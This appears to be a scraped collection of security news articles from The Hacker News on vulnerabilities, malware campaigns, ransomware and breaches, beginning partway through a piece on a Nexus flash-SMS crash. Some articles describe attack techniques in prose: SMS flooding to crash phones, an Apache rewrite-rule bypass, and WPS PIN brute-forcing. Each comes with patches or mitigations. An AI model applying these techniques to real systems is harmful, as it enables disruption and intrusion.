The problem is with how the phones handle a special type of text message, known as a flash SMS. By sending around 30 Flash SMS (Flash SMS is a type of message that normally is not stored by the system and does not trigger any audio alerts) messages to Nexus phone an attacker can cause the phone to malfunction.
He presented the vulnerability on Friday at the DefCamp security conference in Bucharest, Romania. In an email exchange with me, he said 'I was testing different message types and for the class 0 messages I noticed that the popup being displayed also adds an extra layer which makes the background darker.""
""Then my first thought was: what happens if I send more such messages? Will it make the entire background go black? If so, wouldn't this cause a memory leak? The answer is ""Yes"" for both of the questions. So, basically, by sending around 30 Class 0 messages, it will make the Google device behave strangely'.""
According to the researcher, several possible outcomes can result from the overloading:
It will either say that the Messaging application has stopped
Cause a reboot - this is what happens in most of the cases
Make only the Radio (mobile network communication) app restart, but then the device will no longer be able to use mobile data (it can not connect to the APN)
Android devices, by default, offer no easy way for users to send Flash messages, though there are several apps available to do so.
Alecu says that he discovered the issue more than a year ago and he contacted Google and was told back in July that the issue would be addressed in Android 4.3, though that proved not to be the case.
But now Google is aware of the situation, and says that it's investigating things. Until the fix from Google lands, users can use the free Class0Firewall app to prevent such situations.
"How to Remove KeyRaider Malware that Hacked Over 225,000 iOS Devices",https://thehackernews.com/2015/09/how-to-remove-ios-malware.html,"Jailbreaking your device may have got you the best of apps but after reading this you will know what a high price you could have to pay for the jailbreak.
Read on…
A malware named 'KeyRaider' has supposedly stolen user credentials of approximately 225K iPhone users. It has been given this name as it raids victims' username and passwords, private keys and certificates.
Figures say that KeyRaider malware has affected a large number of users in China and worldwide 17 more countries. Also, the origin of malware is suspected to be in China, as said in investigations conducted by Palo Alto Networks for reporting any suspicious tweaks on iPhones.
Users falling prey to KeyRaider may be the victims of:
Data Theft
DDoS Attacks
Malware is targeting jailbroken phones and when in action, it captures Apple ID of the users and make transactions using it.
The researchers say that it is spreading with the help of Cydia app repositories that are popular among the jailbreakers for eliminating the security of the device and installing third party apps.
Palo Alto says:
""The malware hooks system processes through MobileSubstrate, and steals Apple account usernames, passwords, and device GUID by intercepting iTunes traffic on the device.""
""KeyRaider steals Apple push notification service certificates and private keys, steals and shares App Store purchasing information, and disables local and remote unlocking functionalities on iPhones and iPads""
Also, the Palo Alto Networks team has said that this is the biggest ever breach that has happened involving Apple accounts.
Although lot of protection is no more present on jailbroken devices, following measures can be implemented to mitigate the risk as well:
Steps to Remove KeyRaider Malware
Apple device users can use the following method to determine by themselves whether their iOS devices was infected:
Install OpenSSH server app via Cydia
Connect to your device through SSH protocol
Go to /Library/MobileSubstrate/DynamicLibraries/ location on your device, and grep for these strings to all files in the same directory:
If any dylib file contains any one of these strings, delete it and remove the plist file with the same filename, and then reboot your iOS device.
The solution is produced by WeipTech, a Weiphone Tech Team; a technical group startup consisting of users from Weiphone, which is one of the largest Apple fans websites in China.
You can follow the research guide prepared by Palo Alto Networks stating the rogue malware's capabilities and its mitigation.
Hackers Are Using Android Malware To Spy On Israeli Military Personnel,https://thehackernews.com/2017/02/android-malware-israeli-military.html,"A group of highly sophisticated state-sponsored hackers is spying on the Israeli military by hacking into the personal Android phones of individual soldiers to monitor their activities and steal data.
A newly released research by Lookout and Kaspersky suggests that more than 100 Israeli servicemen from the Israeli Defense Force (IDF) are believed to have been targeted with spyware.
Dubbed ViperRAT, the malware has specifically been designed to hijack Israeli soldiers' Android-based smartphones and remotely exfiltrate data of high value, including photos and audio recordings, directly from the compromised devices.
Modus Operandi Identified
According to the security firms, IDF personnel had been compromised by social engineering techniques — where the soldiers were lured via Facebook Messenger and other social networks into entering communications with hackers who posed as attractive women from various countries like Canada, Germany, and Switzerland.
The soldiers were then tricked into installing a trojanized version of two different, typically legitimate Android chat apps, SR Chat and YeeCall Pro, for easier communication.
The malware has also been distributed using a dropper hidden in other Android smartphone applications including a billiards game, an Israeli Love Songs player, and a Move To iOS app, which are common to Israeli citizens and available in the Google Play store.
The app then scanned soldiers' smartphones and downloaded another malicious application that masqueraded as an update for one of the already installed apps, such as WhatsApp, and tricked victims to allow various permissions in order to carry out surveillance.
This, in turn, allowed the attackers to execute on demand commands, enabling them to control phone's microphone and camera, eavesdrop on soldiers' conversations, and peer into live camera footage.
Besides this, the ViperRAT malware gathers a broad range of data from compromised devices including geolocation, call log, personal photos, SMS messages, cell phone tower information, network and device metadata, internet browsing, and app download history.
According to researchers, the hackers were able to successfully establish a widespread cyber espionage campaign by compromising dozens of mobile devices from Samsung, HTC, LG and Huawei belonging to over 100 Israeli soldiers.
Besides, almost 9,000 files stolen from compromised devices (roughly 97 percent) that were exfiltrated from compromised devices were identified by Lookout researchers as being highly encrypted images, which were taken using the device camera.
However, it's likely the IDF is not the only target.
The ViperRAT attack campaign started in July and continued to date, according to Kaspersky researchers.
Is Hamas Behind the Cyber-Spying Operation?
The IDF closely worked with Kaspersky Labs and Lookout to investigate this incident and theorized that Hamas was behind these attacks. However, Lookout researchers have come to doubt that theory.
According to Lookout researchers, ""Based on tradecraft, the modular structure of code and use of cryptographic protocols [AES and RSA encryption] the actor appears to be quite sophisticated.""
Researchers say Hamas is not known for sophisticated mobile capabilities, which makes it unlikely they are directly responsible for ViperRAT.
The IDF is currently working together with both Lookout and Kaspersky to identify infected targets and protect against further attacks, but there is one simple way to protect against ViperRAT: don't download apps from untrusted third-party sources.
Popular WooCommerce WordPress Plugin Patches Critical Vulnerability,https://thehackernews.com/2018/11/woocommerce-wordpress-hacking.html,"If you own an eCommerce website built on WordPress and powered by WooCommerce plugin, then beware of a new vulnerability that could compromise your online store.
Simon Scannell, a researcher at RIPS Technologies GmbH, discovered an arbitrary file deletion vulnerability in the popular WooCommerce plugin that could allow a malicious or compromised privileged user to gain full control over the unpatched websites.
WooCommerce is one the most popular eCommerce plugins for WordPress that helps websites to upgrade their standard blog to a powerful online store. WooCommerce powers nearly 35% of e-stores on the internet, with more than 4 million installations.
Exploiting WooCommerce File-Deletion and WordPress Design Flaws
The attack demonstrated in the following video takes advantage of the way WordPress handles user privileges and WooCommerce file deletion vulnerability, allowing an account with ""Shop Manager"" role to eventually reset administrator accounts' password and take complete control over the website.
When installed, WooCommerce extension creates ""Shop Managers"" accounts with ""edit_users"" capability, allowing them to edit customer accounts of the store in order to manage their orders, profiles, and products.
In WordPress, an account with ""edit_users"" capability by default allowed to even edit an administrator account and reset its password. But to draw a permission-based line between an administrator and a shop manager account, the WooCommerce plugin adds some extra limitations on the shop managers.
However, the researcher discovered that if WordPress admin, for some reason, disables the WooCommerce plugin, its configuration that mandated the limitation goes away, allowing Shop Manager accounts to edit and reset the password for administrator accounts.
Now, according to Simon, a malicious Shop Manager can forcefully disable the WooCommerce plugin by exploiting a file deletion vulnerability that resides in the logging feature of WooCommerce.
""This vulnerability allows shop managers to delete any file on the server that is writable. By deleting the main file of WooCommerce, woocommerce.php, WordPress will be unable to load the plugin and then disables it,"" Simon explains in a blog post.
Once the file is deleted, the WooCommerce plugin gets disabled, allowing shop managers to update the password for the administrator account and then take over the complete website.
Install WooCommerce and WordPress Patch Updates
The researcher responsibly reported the security issues to the Automattic security team, who manages the WooCommerce plugin, via Hackerone on 30, August 2018. The team acknowledged the flaws and fixed them in Woocommerce version 3.4.6 last month.
If you haven,t yet updated your WordPress and Woocommerce, you are highly recommended to install the latest available security updates as soon as possible.
Researchers Uncover Iranian State-Sponsored Ransomware Operation,https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html,"Iran has been linked to yet another state-sponsored ransomware operation through a contracting company based in the country, according to new analysis.
""Iran's Islamic Revolutionary Guard Corps (IRGC) was operating a state-sponsored ransomware campaign through an Iranian contracting company called 'Emen Net Pasargard' (ENP),"" cybersecurity firm Flashpoint said in its findings summarizing three documents leaked by an anonymous entity named Read My Lips or Lab Dookhtegan between March 19 and April 1 via its Telegram channel.
Dubbed ""Project Signal,"" the initiative is said to have kickstarted sometime between late July 2020 and early September 2020, with ENP's internal research organization, named the ""Studies Center,"" putting together a list of unspecified target websites.
A second spreadsheet validated by Flashpoint explicitly spelled out the project's financial motivations, with plans to launch the ransomware operations in late 2020 for a period of four days between Oct. 18 and 21. Another document outlined the workflows, including steps for receiving Bitcoin payments from ransomware victims and decrypting the locked data.
It's not immediately clear if these attacks went ahead as planned and whom they targeted.
""ENP operates on behalf of Iran's intelligence services providing cyber capabilities and support to Iran's Islamic Revolutionary Guard Corps (IRGC), the IRGC Quds Force (IRGC-QF), and Iran's Ministry of Intelligence and Security (MOIS),"" the researchers said.
Despite the project's ransomware themes, the researchers suspect the move could likely be a ""subterfuge technique"" to mimic the tactics, techniques, and procedures (TTPs) of other financially motivated cybercriminal ransomware groups so as to make attribution harder and better blend in with the threat landscape.
Interestingly, the rollout of Project Signal also dovetailed with another Iranian ransomware campaign called ""Pay2Key,"" which ensnared dozens of Israeli companies in November and December 2020. Tel Aviv-based cybersecurity firm ClearSky attributed the wave of attacks to a group called Fox Kitten. Given the lack of evidence, it's unknown what connection, if any, the two campaigns may have with each other.
This is not the first time Lab Dookhtegan has dumped crucial information pertaining to Iran's malicious cyber activities. In a style echoing the Shadow Brokers, the mysterious person or group previously spilled the secrets of an Iranian hacker group known as APT34 or OilRig, including publishing the adversary's arsenal of hacking tools, along with information on 66 victim organizations and doxxing the real-world identities of Iranian government intelligence agents.
News of Iran's second ransomware operation also comes as a coalition of government and tech firms in the private sector, called the Ransomware Task Force, shared a 81-page report comprising a list of 48 recommendations to detect and disrupt ransomware attacks, in addition to helping organizations prepare and respond to such intrusions more effectively.
[Webinar] How Cyber Attack Groups Are Spinning a Larger Ransomware Web,https://thehackernews.com/2021/06/webinar-how-cyber-attack-groups-are.html,"Organizations today already have an overwhelming number of dangers and threats to look out for, from spam to phishing attempts to new infiltration and ransomware tactics. There is no chance to rest, since attack groups are constantly looking for more effective means of infiltrating and infecting systems.
Today, there are hundreds of groups devoted to infiltrating almost every industry, constantly devising more sophisticated methods to attack organizations.
It's even more troubling to note that some groups have started to collaborate, creating complex and stealthy tactics that leave even the best security teams scrambling to respond. Such is the case noted by XDR Provider Cynet, as the company observes in its newest Research Webinar (register here).
Cynet's research team noted that two of the most infamous attack groups – Lunar Spider and Wizard Spider – have started working together to infect organizations with ransomware.
The development is certainly troubling, and the report shows why security teams and professionals must constantly be looking at the whole picture, not just the result of an attack.
Combining attacks for greater impact
Cynet's researchers first noticed something was amiss as they were studying IcedID malware, developed by Lunar Spider. Originally observed in the wild in 2017, IcedID is a banking Trojan that has targeted the financial sectors in both the US and Europe. After it was initially revealed, Lunar Spider shifted IcedID's modus operandi to enable it to deploy additional payloads, such as Cobalt Strike.
The researchers also studied the CONTI ransomware, a relatively new attack approach developed by Wizard Spider that's already in the FBI's crosshairs. This ""ransomware-as-a-service"" (RaaS) has been spotted in the US and Europe and has already wreaked havoc on many organizations and networks.
Cynet first suspected the connection between the two organizations as it was exploring a case of CONTI ransomware that used many familiar tactics, though not ones traditionally deployed by the Wizard Spider group.
During the investigation, the team discovered that CONTI was being deployed through malware campaigns that used IcedID as an initial point of attack. After establishing persistence on targets' devices, IcedID deployed a CONTI ransomware variant to lock the network.
Understanding the risks
The new Cynet Research Webinar will dive deeper into the anatomy of this collaboration to explain why it's so troubling, but also how it can be detected and combatted. The webinar will discuss:
The background of the attack groups. Both Lunar Spider and Wizard Spider are well known and highly dangerous. Their existing malware and other tools are widely popular and present in many notable breaches and attacks. Before exploring their tools, the webinar will break down each group.
The increasing popularity of ransomware attacks. These tactics have become widespread and are expected to cost organizations hundreds of billions of dollars in the next decade. To truly comprehend how to combat this new attack tactic, it's worth establishing how ransomware works, and some common tactics.
The anatomy of a combined IcedID and CONTI attack. The webinar will break down a case study of this new attack tactic. Unlike some other ransomware attacks, this new method uses techniques from both to create persistence, avoid detection, and lock systems before organizations can react. Moreover, they're increasingly using ""double extortion"" methods, which both lock data and threaten leaks if payment isn't received.
You can register to the webinar here.
"Stuxnet's Son ""Duqu"" Removal Tool released by Bitdefender",https://thehackernews.com/2011/10/stuxnets-son-duqu-removal-tool-released.html,"Stuxnet's Son ""Duqu"" Removal Tool released by Bitdefender
Rootkit.Duqu is a new e-threat that combines the technology of the military-grade Stuxnet with an advanced keylogger and backdoor application. Due to its rootkit technology, the piece of malware can stay hidden from the user, the operating system's defense mechanism and even from regular antivirus utilities.Just like its predecessor – the Stuxnet rootkit - Rootkit.Duqu.A is digitally signed with a stolen digital certificate that has been revoked in the meantime. This allows it to install itself on both 32- and 64-bit operating systems on Windows platforms ranging from Windows XP to Windows 7. The Duqu rootkit runs on the computer for 36 days and collects any kind of information entered via the keyboard, including passwords, e-mail or IM conversations. After the ""surveillance"" period ends, the rootkit gracefully removes itself from the system, along with the keylogger component.
Rootkit malware is extremely difficult to detect, as it manages to subvert the operating system before it is fully loaded. Rootkit removal can be challenging even for some antivirus solutions, so manual removal is not recommended. We offer a free and fully automated removal tool that takes care of everything for you.
You only have to download and run it on the system, then reboot the PC if infection is found. Here is a complete rundown of the steps you need to take:
1. Download the Duqu_Removal_Tool.zip (.zip file), then double-click on it chose ""Extract all files..."" from the File menu, and follow the wizard's instructions. You can use any other decompression utility, like WinZip.
2. Navigate to the folder you have extracted the tool in, find the file called Duqu_Removal_tool.exe and double-click on it. Press the Scan button and let the removal tool scan your PC.
3. If you have Windows Vista with User Access Control enabled, or if you are running as a restricted user in Windows XP, right click the Duqu_Removal_tool.exe program and choose ""Run as Administrator"". You will be prompted to enter credentials for an admin account.
4. Press the OK button when the removal tool asks for a reboot.
5. If you don't already have permanent antivirus protection or if your current antivirus has failed you, consider using the advanced protection tool provided by BitDefender.
Download Rootkit.Duqu.A Removal Tool
New Apache Reverse Proxy Flaw Allows Access to Internal Network,https://thehackernews.com/2011/11/new-apache-reverse-proxy-flaw-allows.html,"New Apache Reverse Proxy Flaw Allows Access to Internal Network
Apache acknowledged another reverse proxy issue (CVE-2011-4317) which was discovered by Apache developer from Red Hat while creating a QualysGuard vulnerability signature for an older problem CVE-2011-3368. Depending on the reverse proxy configuration, the vulnerability could allow access to internal systems from the Internet.
In order to set up Apache HTTPD to run as a reverse proxy, server administrators use specialized modules like mod_proxy and mod_rewrite. Apache developers are working on a fix of a flaw in its web server software that creates a possible mechanism to access internal systems.The zero-day vulnerability only rears its ugly head if reverse proxy rules are configured incorrectly and is far from easy to exploit, but it is nonetheless nasty.
The problem isn't new and a vulnerability that allowed similar attacks was addressed back in October. However, while reviewing the patch for it, Qualys researcher Prutha Parikh realized that it can be bypassed due to a bug in the procedure for URI (Uniform Resource Identifier) scheme stripping. The scheme is the URI part that comes before the colon "":"" character, such as http, ftp or file.One relatively common rewrite and proxying rule is ""^(.*) https://internal_host$1"", which redirects the request to the machine internal_host. However, if this is used and the server receives, for example, a request for ""host::port"" (with two colons), the ""host:"" part is stripped and the rest is appended to https://internal_host in order to forward it internally.The problem is that in this case, the remaining part is "":port"", therefore transforming the forwarded request into https://internal_host:port, an unintended behavior that can result in the exposure of a protected resource.In order to mitigate the problem server administrators should add a forward slash before $1 in the rewrite rule, the correct form being ""^(.*) https://internal_host/$1"", Parikh said.
Parikh has published a detailed explanation of the flaw alongside proof of concept code in a post on the Qualys blog here. A possible patch for the vulnerability was suggested by an Apache developer from Red Hat on Wednesday but has yet to be fully tested.
New Pingback Malware Using ICMP Tunneling to Evade C&C Detection,https://thehackernews.com/2021/05/new-pingback-malware-using-icmp.html,"Researchers on Tuesday disclosed a novel malware that uses a variety of tricks to stay under the radar and evade detection, while stealthily capable of executing arbitrary commands on infected systems.
Called 'Pingback,' the Windows malware leverages Internet Control Message Protocol (ICMP) tunneling for covert bot communications, allowing the adversary to utilize ICMP packets to piggyback attack code, according to an analysis published today by Trustwave.
Pingback (""oci.dll"") achieves this by getting loaded through a legitimate service called MSDTC (Microsoft Distributed Transaction Coordinator) — a component responsible for handling database operations that are distributed over multiple machines — by taking advantage of a method called DLL search order hijacking, which involves using a genuine application to preload a malicious DLL file.
Naming the malware as one of the plugins required for supporting Oracle ODBC interface in MSDTC is key to the attack, the researchers noted. While MSDTC isn't configured to run automatically on startup, a VirusTotal sample submitted in July 2020 was found to install the DLL file into the Windows System directory and start the MSDTC service to achieve persistence, raising the possibility that a separate executable is crucial to installing the malware.
Upon successful execution, Pingback resorts to using the ICMP protocol for its main communication. ICMP is a network layer protocol mainly used for sending error messages and operational information, say, a failure alert when another host becomes unreachable.
Specifically, Pingback takes advantage of an Echo request (ICMP message type 8), with the message sequence numbers 1234, 1235, and 1236 denoting the type of information contained in the packet — 1234 being a command or data, and 1235 and 1236 being the acknowledgment for receipt of data on the other end. Some of the commands supported by the malware include the capability to run arbitrary shell commands, download and upload files from and to the attacker's host, and execute malicious payloads on the infected machine.
An investigation into the malware's initial intrusion route is ongoing.
""ICMP tunneling is not new, but this particular sample piqued our interest as a real-world example of malware using this technique to evade detection,"" the researchers said. ""ICMP is useful for diagnostics and performance of IP connections, [but] it can also be misused by malicious actors to scan and map a target's network environment. While we are not suggesting that ICMP should be disabled, we do suggest putting in place monitoring to help detect such covert communications over ICMP.""
Private Decryption Key For Original Petya Ransomware Released,https://thehackernews.com/2017/07/petya-ransomware-decryption-key.html,"Rejoice Petya-infected victims!
The master key for the original version of the Petya ransomware has been released by its creator, allowing Petya-infected victims to recover their encrypted files without paying any ransom money.
But wait, Petya is not NotPetya.
Do not confuse Petya ransomware with the latest destructive NotPetya ransomware (also known as ExPetr and Eternal Petya) attacks that wreaked havoc across the world last month, massively targeting multiple entities in Ukraine and parts of Europe.
The Petya ransomware has three variants that have infected many systems around the world, but now the author of the original malware, goes by the pseudonym Janus, made the master key available on Wednesday.
According to the security researchers, victims infected with previous variants of Petya ransomware, including Red Petya (first version) and Green Petya (second version) and early versions the GoldenEye ransomware can get their encrypted files back using the master key.
The authenticity of the master key has been verified by an independent Polish information security researcher known as Hasherezade.
""Similarly to the authors of TeslaCrypt, he released his private key, allowing all the victims of the previous Petya attacks, to get their files back,"" Hasherezade posted her finding on MalwareBytes on Thursday.
""Thanks to the currently published master key, all the people who have preserved the images of the disks encrypted by the relevant versions of Petya, may get a chance of getting their data back.""
Although the first and second version of Petya was cracked last year, the private key released by Janus offers the fastest and most reliable way yet for Petya-infected victims to decrypt their files, especially locked with the uncrackable third version.
Meanwhile, Kaspersky Lab research analyst Anton Ivanov also analyzed the Janus' master key and confirmed that the key unlocks all versions of Petya ransomware, including GoldenEye.
Janus created the GoldenEye ransomware in 2016 and sold the variants as a Ransomware-as-a-Service (RaaS) to other hackers, allowing anyone to launch ransomware attacks with just one click and encrypt systems and demand a ransom to unlock it.
If the victim pays, Janus gets a cut of the payment. But in December, he went silent.
However, according to the Petya author, his malware has been modified by another threat actor to create NotPetya that targeted computers of critical infrastructure and corporations in Ukraine as well as 64 other countries.
The NotPetya ransomware also makes use of the NSA's leaked Windows hacking exploit EternalBlue and EternalRomance to rapidly spread within a network, and WMIC and PSEXEC tools to remotely execute malware on the machines.
Security experts even believe the real intention behind the recent ransomware outcry, which was believed to be bigger than the WannaCry ransomware, was to cause disruption, rather than just another ransomware attack.
According to researchers, NotPetya is in reality wiper malware that wipes systems outright, destroying all records from the targeted systems, and asking for ransom was just to divert world's attention from a state-sponsored attack to a malware outbreak.
Lucky are not those infected with NotPetya, but the master key can help people who were attacked by previous variants of Petya and Goldeneye ransomware in the past.
Security researchers are using the key to build free decryptors for victims who still have crypto-locked hard drives.
Russian Arrested After Offering $1 Million to U.S. Company Employee for Planting Malware,https://thehackernews.com/2020/08/russian-extortion-malware.html,"Hackers always find a way in, even if there's no software vulnerability to exploit.
The FBI has arrested a Russian national who recently traveled to the United States and offered $1 million in bribe to an employee of a targeted company for his help in installing malware into the company's computer network manually.
Egor Igorevich Kriuchkov, 27-year-old, entered the United States as a tourist and was arrested in Los Angeles after meeting with the unnamed employee of an undisclosed Nevada-based company numerous times, between August 1 to August 21, to discuss the conspiracy.
""On or about July 16, EGOR IGOREVICH KRIUCHKOV used his WhatsApp account to contact the employee of victim company and arranged to visit in person in the District of Nevada,"" the court documents say.
""On or about July 28, EGOR IGOREVICH KRIUCHKOV entered the United States using his Russian Passport and a B1/B2 tourist visa.""
Kriuchkov also asked the employee to participate in developing tailored malware by sharing information about the company's infrastructure.
According to court documents released by the US Justice Department, the malicious software Kriuchkov asked to install aims to extract data from the company's network, allowing attackers to threaten it later to make the information public unless it pays a ransom.
Kriuchkov and his co-conspirators in Russia promised the employee to pay $1 million in Bitcoins after successfully planting the said malware and offered to launch a DDoS attack on the company's network to divert attention from the malware.
""If CHS1 [employee] agreed to this arrangement, the group would provide the malware to CHS1 [employee] in either a thumb drive to be inserted into a computer's USB drive or an email with an attachment containing malware.""
""The unidentified co-conspirator discussed various means by which to pay the employee, including payments using cryptocurrency, a guarantor security deposit, or cash.""
""After being contacted by the FBI, Kriuchkov drove overnight from Reno, Nevada, to Los Angeles. Kriuchkov asked an acquaintance to purchase an airline ticket for him in an attempt to fly out of the country,"" the United States agencies say.
After getting arrested by the FBI, who was conducting physical surveillance of Kriuchkov and his meetings, he listed prior companies the gang had targeted and also revealed that each of these targeted companies had a person working at those companies who installed malware on behalf of the gang.
To be noted, it's quite possible that a few high-profile ransomware and data breach attacks might have been executing in the same way by conspiring with the insiders.
Kriuchkov has been charged with one count of conspiracy to cause damage to a protected computer intentionally.
Hacker Demonstrates How Easy In-flight Entertainment System Can Be Hacked,https://thehackernews.com/2016/12/hacking-in-flight-system.html,"Next time when you hear an announcement in the flight, ""Ladies and gentlemen, this is your captain speaking…,"" the chances are that the announcement is coming from a hacker controlling your flight.
Dangerous vulnerabilities in an in-flight entertainment system used by the leading airlines, including Emirates, United, American Airlines, Virgin, and Qatar, could let hackers hijack several flight systems and even take control of the plane.
According to security researchers from IOActive, the security vulnerabilities resides in the Panasonic Avionics In-Flight Entertainment (IFE) system used in planes run by 13 major airlines, providing a gateway for hackers which is absolutely terrifying.
The security holes could be exploited by hackers that could allow them to spoof flight information like map routes, speed statistics, and altitude values, and steal credit card information.
IOActive's Ruben Santamarta managed to ""hijack"" in-flight displays to change information like altitude and location, control the cabin lighting, as well as hack into the announcements system.
""Chained together this could be an unsettling experience for passengers,"" said Santamarta. ""I don't believe these systems can resist solid attacks from skilled malicious actors. This only depends on the attacker's determination and intentions, from a technical perspective it's totally feasible.""
Besides these critical issues, the researcher said in some instances; hackers could access credit card details of passengers stored in the automatic payment system and use their frequent flyer membership details to capture personal data.
The vulnerabilities affect 13 different airlines that use Panasonic Avionics system, which include American Airlines, United, Virgin, Emirates, Etihad, Qatar, FinnAir, KLM, Iberia, Scandinavian, Air France, Singapore, and Aerolineas Argentinas.
The vulnerabilities were reported to Panasonic in March last year, and the researcher waited more than a year and a half to go public, so the company had ""enough time to produce and deploy patches, at least for the most prominent vulnerabilities.""
Emirates is working with Panasonic to resolve these issues and regularly update its systems. ""The safety of our passengers and crew on board is a priority and will not be compromised,"" Emirates said, reported the Telegraph.
Santamarta is the same researcher who warned of security issues in systems used by different aircraft in the past.
Back in 2014, he discovered that it was possible to reverse engineer a bug, which let him connect to the Wi-Fi signal or the in-flight entertainment system to connect to airplanes' equipment, including the navigation system.
For in-depth technical details about the new vulnerabilities discovered by Santamarta, you can head on to IOActive's official blog post published today.
Easy Router PIN Guessing with new WiFi Setup vulnerability,https://thehackernews.com/2011/12/easy-router-pin-guessing-with-new-wifi.html,"Easy Router PIN Guessing with new WiFi Setup vulnerability
There is a newly discovered vulnerability in the WiFi Protected Setup standard that reduces the number of attempts it would take an attacker to brute-force the PIN for a wireless router's setup process. The flaw results in too much information about the PIN being returned to an attacker and makes the PIN quite weak, affecting the security of millions of WiFi routers and access points. Security researcher Stefan Viehbock discovered the vulnerability (PDF) and reported it to US-CERT.
The problem affects a number of vendors' products, including D-Link, Netgear, Linksys and Buffalo. ""I noticed a few really bad design decisions which enable an efficient brute force attack, thus effectively breaking the security of pretty much all WPS-enabled Wi-Fi routers. As all of the of the more recent router models come with WPS enabled by default, this affects millions of devices worldwide"" Viehbock said.
""One authentication attempt usually took between 0.5 and 3 seconds to complete. It was observed that the calculation of the Diffie-Hellman Shared Key (needs to be done before generating M3) on the AP took a big part of the authentication time. This can be speeded up by choosing a very small DH Secret Number, thus generating a very small DH Public Key and making Shared Key calculation on the AP's side easier.,"" he says.
""When the PIN authentication fails the access point will send an EAP-NACK message back to the client. The EAP-NACK messages are sent in a way that an attacker is able to determine if the first half of the PIN is correct. Also, the last digit of the PIN is known because it is a checksum for the PIN. This design greatly reduces the number of attempts needed to brute force the PIN. The number of attempts goes from 108 to 104 + 103 which is 11,000 attempts in total,"" the US-CERT advisory says.
Viehbock also developed a Python tool to brute-force the PINs. He hasn't released the tool yet, but says he may do so once the code is in better shape. None of the affected vendors have released fixes or workarounds for the bug, but Viehbock says in his paper that disabling WPS looks to be the main practical mitigation, Implementing long lock-out times for multiple authentication failures would help as well.
Zero-day Smartphone Vulnerability exposes location and User Data,https://thehackernews.com/2012/02/zero-day-smartphone-vulnerability.html,"Zero-day Smartphone Vulnerability exposes location and User Data
Smartphones are increasingly becoming the preferred device for both personal and professional computing, which has also attracted hackers to increase their focus on creating malware and other security vulnerabilities for these devices. A former McAfee researcher ""Dmitri Alperovitch"" has used a previously unknown hole in smartphone browsers to plant China-based malware that can record calls, pinpoint locations and access user texts and emails.
He conducted the experiment on a phone running Android operating system, although he saysApple Inc.'s iPhones are equally vulnerable. Android is particularly vulnerable because it has become the main operating system for mobile devices. Today most smartphones are android-based therefore there is a huge dividend for hackers to write Android-targeted malware compared to other operating systems.
Alperovitch, who has consulted with the U.S. intelligence community, is scheduled to demonstrate his findings Feb. 29 at the RSA conference in San Francisco, an annual cyber security gathering. Alperovitch and his team reversed engineered the malware called Nickispy and and took control of it.
A nice little piece of Android spyware, commonly known as 'NickiSpy.C' . For those unfamiliar, NickiSpy gained quite a bit of notoriety around July/August 2011, as it was one of the first malicious Android applications to have the ability to record phone calls. Alperovitch said he exploited a so-called zero-day vulnerability in smartphone browsers to secretly install the malware. Zero-day vulnerabilities are ones that are not yet known by the manufacturers and anti-virus companies.
The malware also intercepts texts and emails and tracks the phone's location, he said. In theory, it could be used to infiltrate a corporate network with which the phone connects. Like most pieces of Android spyware/malware, installation is dependant on the end-user. In an experiment he also delivered it through a classic ""spear phishing"" attack.
Protect from Malware : For Android, the danger is downloading apps outside of Google's App Market . If you're off somewhere getting apps from sources you don't know or trust, there could be consequences. For iPhone users, the line really is whether you jailbreak or not. Jailbreaking can be pretty easy, and getting pirated or bootlegged apps can seem like a great way to save money, but in doing so, you're basically handing out the smart phone equivalent of a front door key to Lord only knows.
Hackers Exploiting 'Bitmessage' Zero-Day to Steal Bitcoin Wallet Keys,https://thehackernews.com/2018/02/bitmessage-bitcoin-hackers.html,"Bitmessage developers have warned of a critical 'remotely executable' zero-day vulnerability in the PyBitmessage application that was being exploited in the wild.
Bitmessage is a Peer-to-Peer (P2P) communications protocol used to send encrypted messages to users. Since it is decentralized and trustless communications, one need-not inherently trust any entities like root certificate authorities.
Those who unaware, PyBitmessage is the official client for Bitmessage messaging service.
According to Bitmessage developers, a critical zero-day remote code execution vulnerability, described as a message encoding flaw, affects PyBitmessage version 0.6.2 for Linux, Mac, and Windows and has been exploited against some of their users.
""The exploit is triggered by a malicious message if you are the recipient (including joined chans). The attacker ran an automated script but also opened, or tried to open, a remote reverse shell,"" Bitmessage core developer Peter Šurda explained in a Reddit thread.
""The automated script looked in ~/.electrum/wallets [Electrum wallets], but when using the reverse shell, he had access to other files as well. If the attacker transferred your Bitcoins, please contact me (here on Reddit).""
Moreover, hackers also targeted Šurda. Since his Bitmessage addresses were most likely considered to be compromised, he suggested users not to contact him at that address.
""My old Bitmessage addresses are to be considered compromised and not to be used,"" Šurda tweeted.
Šurda believes that the attackers exploiting this vulnerability to gain remote access are primarily looking for private keys of Electrum bitcoin wallets stored on the compromised device, using which they could/might have stolen bitcoins.
Bitmessage developers have since fixed the vulnerability with the release of new PyBitmessage version
So, if you are running an affected version of PyBitmessage, you are highly recommended to upgrade your software to version
Since the vulnerability affects PyBitmessage version 0.6.2 and not PyBitmessage 0.6.1, alternatively you can also consider, as suggested by Šurda, downgrading your application to mitigate yourself from potential zero-day attacks.
Although the developers did not reveal more details about the critical vulnerability, Šurda advised users to change all their passwords and create new Bitmessage keys, if they have any suspicion of their computers being compromised.
Binary files for Windows and OSX are expected to become available on Wednesday.
The investigation into these attacks is still ongoing, and we will update this article with more information as it becomes available.
Stay Tuned! Stay Safe!
German software developer Ashampoo Hit by Data Breach !,https://thehackernews.com/2011/04/german-software-developer-ashampoo-hit.html,"German software developer Ashampoo Hit by Data Breach !
German software developer Ashampoo has notified its customers about a data breach incident that resulted in the exposure of their names and email addresses.
According to an announcement posted on the company's website, unidentified hackers broke through its security systems and gained unauthorized access to a server.
""We discovered the break-in and interrupted it instantly. The security gap through which the hackers gained access was closed immediately,"" said Ashampoo's CEO Rolf Hilchner.
""At the same time we reported this incident to the police. Further investigations are underway. Unfortunately, the traces of the well-concealed hackers currently disperse abroad,"" he added.
Fortunately, the hackers did not obtain access to billing information as this data is not stored on the company's servers.
In addition to its software development business, which includes anti-malware, firewall and data encryption products, the Ashampoo Group offers a diverse range of services through subsidiaries.
Examples of these are DownloadMix, CleverReach, H&B Immobilien, CarShampoo or Ashampoo Air Services, but none of them were impacted by this incident.
Ashampoo didn't disclose how many individuals were affected by the breach, but since the company claims to have has over 13.8 million customers, their number is probably very large.
This incident is the latest in a series of security breaches that resulted in the theft of customer email lists from major companies.
At the beginning of the month, Epsilon Data Management, one of the largest email marketing services provider in the world announced that its servers were compromised by hackers who walked away with the email addresses and names of tens or hundreds of millions of consumers.
